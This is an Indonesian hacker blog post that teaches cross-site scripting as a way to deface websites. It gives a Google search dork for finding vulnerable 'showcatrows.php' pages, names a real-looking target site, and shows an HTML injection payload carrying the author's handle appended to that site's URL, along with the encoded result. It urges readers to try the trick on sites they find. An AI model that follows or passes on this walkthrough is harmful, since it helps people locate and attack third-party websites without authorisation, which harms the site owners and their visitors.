adsense

Kau mungkin bisa menutup mulutku, menghentikan aksiku, bahkan memenjarakan aku, tapi kau tidak akan pernah bisa menghentikan kekuatan IDE, karena 'FIKIRAN' ku dapat merubah DUNIA meski dibawah
ancaman mu!
»

serangan XSS (Cross Site Scripting)

Apaan sih XSS tuh ?


 Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection,
XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap
kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini
juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs
KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga
seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil
curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk
menjalankan aksi ilegalnya. :)
Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada
sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu
tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan
dari isi website.
Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk
memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :
1.untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan
setelah kata=

nih cueng gw kasih tutor
gw nemu dork  ini
inurl:"/showcatrows.php?CategoryID="      betawi eh BTW gw nemu dork itu di www.exploit-db.com  < di situ tiap hari banyak hacker ngelaporin bug-bug terbaru 

 persiapan -_-
-minta doa restu sama orang tua 
-kopi+rokok+
-dork:i nurl:"/showcatrows.php?CategoryID="
mulai
masukin dork(kata kunci) ke si akang google
trus pilih satu site yg keluar
cara hack web
Add caption
gw pilih yang k 1

http://www.paypalshop.org/showcatrows.php?CategoryID=5

contoh nih target gw http://www.paypalshop.org/showcatrows.php?CategoryID=5

kode html gw ><marquee><h1>lugaz_cyber_brd007</h1></marquee>
trus tambahin scipt  html nya  di ujung URL target   -_-
liat gabar di bawah
dan tekan enter 
maka hasil nya 
http://www.paypalshop.org/showcatrows.php?CategoryID=5%3E%3Cmarquee%3E%3Ch1%3Elugaz_cyber_brd007%3C/h1%3E%3C/marquee%3E
---------------------------------------------------------------------------------------------------------------------
NOTE :buat script html nya bebas sih gimna kreatifitas kalian

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

walaupun simple gan cobain aja  daripada NITIP NICKNAME HEKEL AGAN YG KEREN  doang mah
DAN ANE COBA LEWAT HP JUGA BISA GAN -



"KEAMANAN HANYALAH SEBUAH ILUSI DARI KE TIDAK TAHUAN SEMENTARA" -lugaz_cyber_brd007



Postingan terkait:

Add Comment

Belum ada tanggapan untuk "serangan XSS (Cross Site Scripting)"

Posting Komentar

ada pertanyaan atau komentar gak bro ???

Langganan: Posting Komentar (Atom)